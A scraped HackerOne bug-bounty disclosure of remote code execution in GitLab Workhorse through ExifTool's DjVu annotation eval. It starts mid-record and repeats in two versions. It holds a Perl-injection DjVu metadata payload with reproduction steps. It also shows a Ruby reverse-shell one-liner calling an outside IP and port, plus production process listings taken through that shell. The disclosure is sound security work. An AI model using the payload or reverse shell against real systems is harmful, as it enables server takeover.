? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T18:31:05", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T18:31:05", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T18:31:05", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQUT3722VD%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T183104Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJGMEQCIGL8kr5CVC8awfwyBK5mVDl7mO22Pe4ibOGIihALuIATAiBQoywE2vxv41OILZjSBDzeu5Cgy4Zz4%2FtmyPYW%2BCE2xyr6AwgaEAIaDDAxMzYxOTI3NDg0OSIMVsPmCCaVMarxAVCRKtcDjb0D0Vn5S5eEIltXBYfxvMJMb3nb8z6y7pZAVaBnX1jovIq9767jDhMDhpSHEiINLmtlZato8LR7GmGNjfm59JS20pEzno8LBE06tDGF6%2F7nPWrUPhxAYO1QmiRJY%2FOzGq6PmDhmjOeoQl9mjFLwcnoyvZFPLQDXZGXCvZU3mj1rrTda9PFZKxxlRojFry8X5CvxwnKvG8e4Vcf7OKRWxH2oEB2nVeEFIxO5jbgrfuMisJyewVXGiSI4qKTVmiBEgttcNT2nPC2P4w0lLdKqcxOStTak9TmeBR0a4ybY79iaLyXVIUnWfVEr3Pxo7BDWgnfPMf7iKoZaPw921YJ7TOmcbD78EriUFXbah4KXLvDYo3D8WfvRWuiYPHvJQD%2Fl%2BvHpwGseZuXtDASpSHvSWpGRC0ib1N88U2uttMQFGuLsnKwnG3xBgmvreNZZJmUOOfEMxj%2BqCSi%2BOtcJET%2FGIHoe2%2F1MALlaonS%2BMMXMHDUsEBWN4SmVMyQltTFHmpCVtR6XvLD%2BvfLl%2B%2BcHdQmzJZnB%2FZIi7O1NQb6vkPQF3ZKv7yOqYhHCZUhu5QgX0M9kEWvqEyGnfWuG1kG9p1tPfx4ZmGQdFvKGOCr%2BnCilJhOoN%2FRP0zEMMMv9%2F4QGOqYBjdXwF2%2BtugTcTeacrNukS7ZF43RXoRY44XL8UkLO2OBlmoYyYfqOfNmvGRNNk81dUwohlajbp8CZBgFuY1S9PN2s%2F2%2FbKsSdiXvBxSMm%2B9UL%2BMZOxLV%2BhdOWyUBtb6jlbJWJBxZNFDFkZCEOMQCvEwmGRylb3%2BLi5ah2nGfVQrx2oSfF9XYVwceCjGE1khiXAwAYXUeA3gDQrYKIglpqYRjQYkK0aQ%3D%3D&X-Amz-Signature=1d162ab3aceeffd6a7df43598289187fc09de262118f16418e00b715dbfaeffa"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T18:31:05", "differentElements": ["h1reporter"], "edition": 23}, {"bulletin": {"id": "H1:1154542", "hash": "01e480fa055f914b87008f2a08a4d779", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 